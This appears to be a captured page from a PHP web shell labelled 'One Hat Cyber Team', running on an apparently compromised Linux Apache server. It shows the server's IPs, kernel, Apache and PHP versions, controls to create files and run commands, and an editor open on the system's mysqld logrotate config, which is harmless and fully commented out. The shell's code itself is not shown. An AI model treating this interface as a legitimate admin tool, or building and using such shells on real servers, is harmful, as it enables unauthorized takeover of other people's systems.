One Hat Cyber Team
Your IP :
172.70.50.39
Server IP :
188.114.97.7
Server :
Linux advantage-project 5.14.0-503.26.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 19 16:28:19 UTC 2025 x86_64
Server Software :
Apache/2.4.62 (Rocky Linux) OpenSSL/3.2.2
PHP Version :
8.3.17
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
logrotate.d
/
Edit File:
mysqld
# The log file name and location can be set in # /etc/my.cnf by setting the "log-error" option # in [mysqld] section as follows: # # [mysqld] # log-error=/var/log/mysql/mysqld.log # #/var/log/mysql/mysqld.log { # create 640 mysql mysql # notifempty # daily # rotate 5 # missingok # compress # postrotate # # SIGUSR1 makes the daemon to flush the logs, no need to connect through mysqladmin # /usr/bin/kill -USR1 $(systemctl show --property MainPID --value mysqld) # endscript #}
Simpan